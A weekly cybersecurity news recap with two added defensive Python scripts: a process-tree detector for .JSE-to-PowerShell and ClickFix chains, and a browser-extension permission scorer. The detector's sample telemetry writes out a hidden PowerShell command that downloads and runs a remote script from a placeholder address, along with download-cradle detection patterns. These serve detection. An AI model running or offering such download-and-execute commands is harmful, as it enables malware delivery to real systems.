Weekly Cybersecurity Recap - 21 April 2025

Major Cyber Breaches, Vulnerabilities & Industry Updates

    Introduction

    This week’s cybersecurity landscape featured a wave of diverse threats and shifting strategies: from multi-stage malware campaigns exploiting simple email lures to surging GPS spoofing attacks disrupting flight paths. We also saw a steep rise in unapproved AI use across enterprises, concerning ad abuse numbers from Google, and growing attention on security posture management and browser extension risk. Let’s dive into this week’s most important updates.

    Malware & Threat Campaigns

    Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader

    A newly observed multi-stage attack chain is being used to deploy several malware families, including Agent Tesla, Remcos RAT and XLoader. The attack starts with a phishing email posing as a payment confirmation that lures the recipient into opening a malicious 7-Zip archive. The archive contains a JScript Encoded (.JSE) file which, when launched, runs under Windows Script Host (wscript.exe) and downloads a PowerShell script from an external server. That script acts as the second-stage dropper and ultimately launches the final payload. Because each stage is a built-in interpreter invoking the next, the process relationship (wscript.exe spawning powershell.exe with a download command) is a more durable detection point than any single file hash or lure subject.

    State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns

    Threat actors are actively using the ClickFix technique in targeted malware operations. ClickFix shows the victim a fake error message, CAPTCHA or login challenge and instructs them to "fix" it by pasting an attacker-supplied command into the Windows Run dialog or a terminal, so the victim launches the payload themselves and no exploit, macro or dropped executable is needed at the entry point. Previously associated with cybercriminal groups, the technique is now being adopted by nation-state actors such as TA427 (Kimsuky), TA450 (MuddyWater) and APT28. The TA450 campaign in particular has targeted finance, healthcare and government organizations across the U.S., Europe and the Middle East, with a heavy focus on the U.A.E. and Saudi Arabia.
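The two process-tree patterns described in the .JSE-to-PowerShell chain above and in the ClickFix item can be expressed as one small detector over process-creation telemetry. This is an added example written for this recap; it is not from the original reporting or from any vendor's rule set. The event shape (pid, ppid, image, command line, as Sysmon Event ID 1 or Windows Security 4688 provide), every sample event, host name, path and IP address, and the regexes and process lists are constructed editorial assumptions to be tuned against your own baseline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    """One process-creation record (shape modelled on Sysmon EID 1 / Windows 4688)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Interpreters a Run-dialog (Win+R) ClickFix lure typically launches
RUN_DIALOG_CHILDREN = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                       "curl.exe", "certutil.exe", "bitsadmin.exe")

# Download cradles and remote-content indicators common in PowerShell stagers
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-expression|\biex\b|https?://",
    re.IGNORECASE)
# Flags that hide the console or carry an encoded payload
EVASION_FLAGS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden\b|-nop\b|-ep\s+bypass\b",
    re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: List[ProcessEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, child_pid) for every event that matches a rule, in event order."""
    by_pid: Dict[int, ProcessEvent] = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:          # parent not in this batch; nothing to correlate
            continue
        child_name, parent_name = basename(child.image), basename(parent.image)

        # Rule 1: a script host running a .jse file spawns PowerShell that pulls remote content
        if (parent_name in SCRIPT_HOSTS and ".jse" in parent.cmdline.lower()
                and child_name in ("powershell.exe", "pwsh.exe")
                and DOWNLOAD_CRADLE.search(child.cmdline)):
            findings.append(("jse_to_powershell_download", child.pid))

        # Rule 2 (ClickFix): explorer.exe, the parent of anything typed into Win+R,
        # launches an interpreter with hidden-window, encoded or download arguments
        if (parent_name == "explorer.exe" and child_name in RUN_DIALOG_CHILDREN
                and (EVASION_FLAGS.search(child.cmdline)
                     or DOWNLOAD_CRADLE.search(child.cmdline))):
            findings.append(("clickfix_run_dialog", child.pid))
    return findings


# Constructed sample telemetry: two malicious chains and three benign launches.
SAMPLE_EVENTS = [
    ProcessEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    # user extracts the "payment confirmation" archive and double-clicks invoice.jse
    ProcessEvent(4210, 100, r"C:\Windows\System32\wscript.exe",
                 r'"C:\Windows\System32\wscript.exe" "C:\Users\bob\Downloads\Payment_Confirmation\invoice.jse"'),
    # wscript.exe spawns the second stage: hidden PowerShell fetching stage2.ps1 (TEST-NET address)
    ProcessEvent(4288, 4210, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://203.0.113.10/stage2.ps1')\""),
    # ClickFix: victim pastes the 'fix' into Win+R; constructed payload decodes to 'IEX'
    ProcessEvent(5100, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -enc SQBFAFgA"),
    # benign: an admin opens PowerShell from the Start menu with no flags
    ProcessEvent(5200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'),
    # benign: logon script under cscript.exe, no .jse and no download cradle
    ProcessEvent(5300, 100, r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe //nologo \\dc01\netlogon\logon.vbs"),
    ProcessEvent(5301, 5300, r"C:\Windows\System32\net.exe", r"net use H: \\fs01\home"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Two operational notes. First, Rule 2 keys on explorer.exe as the parent because that is how a command typed into the Run dialog appears; a ClickFix lure that tells the victim to open a terminal and paste will instead show conhost.exe or WindowsTerminal.exe in the chain, so extend the parent list if that variant matters to you. Second, for forensic corroboration of a Run-dialog launch, the victim's HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key keeps the history of commands typed into Win+R.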

    Ad Abuse & Digital Fraud

    Google Blocked 5.1B Harmful Ads and Suspended 39.2M Advertiser Accounts in 2024

    In its 2024 ad safety report, Google said it blocked 5.1 billion malicious ads and suspended over 39 million advertiser accounts. These accounts were primarily flagged for scam activity, legal violations, or trademark abuse. Top violations included ad network abuse, financial scams, and misrepresentation. The company also restricted ads on 1.3 billion web pages. The scale of enforcement highlights ongoing abuse of digital ad infrastructure as a vehicle for fraud and malware distribution.

    Security Research & Insights

    Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report Finds

    A report from LayerX finds that most browser extensions in enterprise use request permissions far broader than their function requires, such as access to every site the user visits, cookies, or the ability to read and modify web requests, which turns a productivity add-on into a credential- and session-theft risk. The analysis combines public marketplace statistics with enterprise telemetry, offering a real-world view of this hidden threat surface. It raises red flags about developers' trustworthiness and about the kinds of permissions being granted, pointing to a need for IT teams to re-evaluate browser governance policies.
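To make the over-permission point concrete, here is an added example (written for this recap, not LayerX's methodology or tooling) that scores a Chrome or Edge extension's manifest.json by the permissions and host patterns it declares. The permission names are the real extension API names, but the risk weights, the score thresholds and all three sample manifests are constructed editorial assumptions; adjust the weights to your own policy before using the scores to drive an allow-list.

```python
import json
from typing import Dict, List, Tuple

# Assumed per-permission risk weights (editorial assumptions, not a vendor's scoring)
PERMISSION_RISK: Dict[str, int] = {
    "<all_urls>": 5, "*://*/*": 5, "http://*/*": 4, "https://*/*": 4,
    "debugger": 5, "nativeMessaging": 5,
    "webRequest": 4, "webRequestBlocking": 4, "cookies": 4, "scripting": 4,
    "clipboardRead": 4, "proxy": 4,
    "declarativeNetRequest": 3, "history": 3, "identity": 3, "management": 3,
    "tabs": 2, "webNavigation": 2, "downloads": 2, "clipboardWrite": 2,
    "activeTab": 1,
    "storage": 0, "alarms": 0, "notifications": 0, "contextMenus": 0,
}
UNKNOWN_RISK = 1          # permission not in the table: count it, flag nothing
BROAD_HOST_RISK = 4       # host pattern covering every origin of a scheme
NARROW_HOST_RISK = 1      # host pattern scoped to particular domains


def is_broad_host(pattern: str) -> bool:
    """True for match patterns that cover every origin (e.g. <all_urls>, https://*/*)."""
    p = pattern.strip()
    return p in ("<all_urls>", "*://*/*") or p.startswith(("http://*/", "https://*/", "*://*/"))


def assess(manifest: dict) -> Tuple[int, List[str]]:
    """Score one parsed manifest; return (score, human-readable reasons for the score)."""
    score = 0
    reasons: List[str] = []
    # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions"
    declared = (list(manifest.get("permissions", []))
                + list(manifest.get("optional_permissions", []))
                + list(manifest.get("host_permissions", [])))
    for perm in declared:
        if perm in PERMISSION_RISK:
            weight = PERMISSION_RISK[perm]
        elif is_broad_host(perm):
            weight = BROAD_HOST_RISK
        elif "://" in perm:
            weight = NARROW_HOST_RISK
        else:
            weight = UNKNOWN_RISK
        score += weight
        if weight >= 3:
            reasons.append(f"permission {perm!r} (weight {weight})")
    # A content script matched on every page reads and alters every site the user opens
    for cs in manifest.get("content_scripts", []):
        broad = [m for m in cs.get("matches", []) if is_broad_host(m)]
        if broad:
            score += 5
            reasons.append(f"content script injected on every page: {broad}")
    if manifest.get("manifest_version", 3) < 3:
        score += 2
        reasons.append("Manifest V2 (deprecated; looser background and remote-code rules)")
    return score, reasons


def classify(score: int) -> str:
    """Bucket a score into a review tier (thresholds are assumptions)."""
    return "high" if score >= 10 else "medium" if score >= 4 else "low"


def assess_json(text: str) -> Tuple[str, int, List[str]]:
    """Parse a manifest.json body and return (tier, score, reasons)."""
    score, reasons = assess(json.loads(text))
    return classify(score), score, reasons


# Constructed sample manifests
OVERPERMISSIVE = {
    "manifest_version": 3, "name": "Coupon Finder (constructed sample)",
    "permissions": ["cookies", "webRequest", "scripting", "tabs", "storage", "nativeMessaging"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
}
MV2_NARROW = {
    "manifest_version": 2, "name": "Ticket Helper (constructed sample)",
    "permissions": ["tabs", "storage", "https://*.example.com/*"],
}
MINIMAL = {
    "manifest_version": 3, "name": "Tab Counter (constructed sample)",
    "permissions": ["activeTab", "storage"],
}

if __name__ == "__main__":
    for m in (OVERPERMISSIVE, MV2_NARROW, MINIMAL):
        score, reasons = assess(m)
        print(f"{m['name']}: {classify(score)} ({score})")
        for r in reasons:
            print("   -", r)
```

Run against a fleet, the useful output is not the absolute score but the tail: extensions with broad host access plus cookies, webRequest or nativeMessaging, which is the combination that lets an add-on harvest sessions or talk to a local binary, belong on a manual-review list regardless of how many installs they have.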

    The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools

    An enterprise AI study from Software AG shows that half of workers are using unapproved AI tools at work. Many of these users said they would continue even if banned. This trend reveals a shift from sanctioned tool usage toward personal productivity optimization, driven by the convenience and availability of AI platforms. Experts now urge organizations to move beyond passive monitoring and toward active management of Shadow AI, building guardrails around its inevitable adoption.

    Demystifying Security Posture Management

    Security Posture Management (SPM) is gaining attention as companies prioritize measurable outcomes over checkbox compliance. With the recent run of acquisitions around posture vendors such as Wiz, Avalor and Dassana, the SPM space is heating up. Practitioners remain cautious, though, asking whether these platforms actually reduce operational complexity or simply add another layer. The future of SPM depends on its ability to turn posture insights into real, actionable improvements without overwhelming security teams.

    Regional & Strategic Trends

    Middle East, North Africa Security Spending to Top $3B

    Gartner forecasts that MENA cybersecurity spending will reach $3.3 billion this year, a 13.7% increase. Growth is being driven by the rapid digitization of industries and by rising threats. Security services, led by managed detection and response and by advisory work, will draw the largest share of investment. The data was presented at the recent Gartner Security and Risk Management Summit in Dubai and shows a strong commitment by regional organizations to harden their cyber defenses.

    GPS Spoofing Attacks Spike in Middle East, Southeast Asia

    Spoofing attacks on GPS systems are becoming more common in areas like Myanmar, the Middle East, and the India-Pakistan border. These incidents pose serious risks to both military and civilian aviation. An Indian disaster-relief flight was recently affected, raising alarms about aviation safety in conflict-prone areas. These disruptions echo patterns seen in 2024, when jamming and spoofing incidents surged in Eastern Europe and the South China Sea.
